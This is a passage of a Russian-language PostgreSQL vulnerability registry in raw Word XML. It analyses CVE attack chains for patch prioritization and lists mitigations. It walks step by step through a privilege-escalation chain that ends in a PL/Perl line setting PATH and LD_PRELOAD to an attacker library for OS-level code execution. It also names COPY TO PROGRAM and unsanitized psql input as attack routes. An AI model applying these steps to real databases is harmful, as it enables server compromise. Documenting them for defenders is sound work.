          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. На уязвимом кластере (PG до фикса R16) атакующий с CREATE на любой schema создаёт объект (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION public.foo() RETURNS void LANGUAGE plperl AS $$ ... $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с именем, которое какой-то extension script будет создавать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Имена популярных extension-функций известны (документация / source code).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Admin / superuser запускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION &lt;ext_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension script выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE FUNCTION foo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с собственным телом. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R16-баг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: вместо создания новой функции от имени admin-а PostgreSQL «забирает» уже существующий объект attacker-а в extension; ownership формально переходит, но плановщик / planner-кэш в некоторых code-paths продолжает использовать attacker-controlled body. Конкретные сценарии — см. advisory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Admin использует ftext (функцию, оставшуюся от первоначального attacker-объекта) — выполняется код атакующего в admin-контексте. Так как тело — PL/Perl trusted, на pre-R7-фикс-кластере доступна модификация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{}</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DELAYED ACTIVATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: даже если cluster потом upgrade-нут на 14.5+ (R16 фикс), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже подменённый объект</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pg_proc продолжает содержать attacker-controlled body. R16-фикс защищает от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">новых</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> случаев подмены, но не cleanup-ит уже существующие. Audit требует ручного scan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для objects с подозрительным ownership/history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Дальше — R7 (CVE-2024-10979): attacker-controlled PL/Perl код выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{'PATH'} = '/tmp:/usr/bin'; $ENV{'LD_PRELOAD'} = '/tmp/atak.so';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контексте процесса postgres. При следующем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-вызове из postgres-backend (через COPY PROGRAM, через pg_dump-spawned utility, через external authentication helper) — RCE как OS-пользователь postgres, без plperlu, без superuser-роли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> На шаге 1 — CREATE на любой схеме (даже public до PG 15). На шагах 3–5 — никакой дополнительной привилегии (объект использует admin, attacker уже dropped role).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует цепочку.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R16 fix (14.5 batch 11.08.2022)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension scripts проверяют ownership объекта, шаг 2 не работает на свежих cluster-ах.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R7 fix (17.1 batch 14.11.2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — plperl не позволяет модифицировать $ENV, шаг 5 не даёт RCE; backdoor остаётся, но не эскалируется до OS-level.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На upgrade-нутом cluster-е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R16 patch применяется к новым extensions, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже подменённые объекты pre-upgrade остаются</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Cleanup требует ручного audit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для objects с подозрительным ownership.</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Запрет CREATE на public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 15 default; для PG ≤14 — manual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — отрезает шаг 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-ref.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R16: 3.13.4. R7: 3.7.2b.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводка: priority patches для разрыва цепочек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Цепочка</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Single-point fix</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Defence-in-depth</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 → R21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 fix (батч 13.02.2025: 17.3 / 16.7 / 15.11 / 14.16 / 13.19)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Ограничить, кто запускает psql на user-input (не делать </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">psql -c "$user_input"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> из обёрток); запретить </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">COPY ... TO PROGRAM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на серверной роли — defence от server-side variant chain.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R8 + R9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Батч 14.11.2024 (17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21) — оба CVE одновременно</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FORCE ROW LEVEL SECURITY</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SET LOCAL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> вместо </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для tenant-роли + unique connections (без pool) для критичных операций; запретить </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">bypassrls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на application-роли.</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R16 → R7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R16 fix (батч 11.08.2022: 14.5 / 13.8 / 12.12) ИЛИ R7 fix (батч 14.11.2024) — разрывают цепь на разных стадиях</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REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (PG 15+ по умолчанию; для ≤14 — manual); audit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_proc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для objects с подозрительным history (особенно extension functions); CREATE на DB только trusted ролям.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: почему цепочки важны для defenders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Standalone CVSS не отражает реальный impact CVE-в-звене-цепочки: R10 (libpq MITM, CVSS Medium) сам по себе требует MITM-позиции и редко эксплуатируется; R21 (chain-вариант R6) без R6 не существует как самостоятельная атака. Для prioritization patch-ов defenders должны смотреть на цепочки, а не только на standalone severity: цепочка R6 → R21 — пример, где CVE с заявленным CVSS High приобретает CRITICAL-impact через chain с COPY TO PROGRAM, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">end-state — RCE на DBA workstation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не просто SQL injection. Цепочка R16 → R7 показывает другую особенность: один CVE-фикс (R16) не закрывает уже-материализованные backdoor-объекты; defence-in-depth (audit pg_proc, revoke CREATE) необходим даже после upgrade. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правило</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: при патч-планировании сначала закрывать CVE-звенья цепочек end-of-chain (R7 в R16→R7), потом — entry-point CVE (R16, R6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8 Информационные CVE (low-severity / DoS / disclosure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Группа CVE, не дающих прямой эксплуатации (RCE, RLS bypass, privilege escalation), но важных для compliance / audit / supply chain analysis. Полные карточки — в 4.3, 4.4, 4.5; здесь — группировка по severity-классу с акцентом на «зачем включать в реестр уязвимостей, если impact низкий».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory leak / disclosure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R14 — CVE-2023-5868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (aggregate с unknown-type memory disclosure). Карточка: см. 4.3.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: leak memory bytes может содержать фрагменты SQL других сессий, password hashes (если pg_authid был в page cache), session tokens.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Audit-сигнал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: частые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_agg('A', '')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подобные в pg_stat_statements от не-aggregate ролей.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R17 — CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pg_stats_ext leak). Карточка: 3.8.6.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: leak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> чужих таблиц без права SELECT — фрагменты данных, в том числе PII в production.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Ловушка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: requires manual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в каждой БД даже после minor upgrade. Managed-провайдеры могут не запустить fix-script автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory corruption / ACE без public PoC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R13 — CVE-2023-5869</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
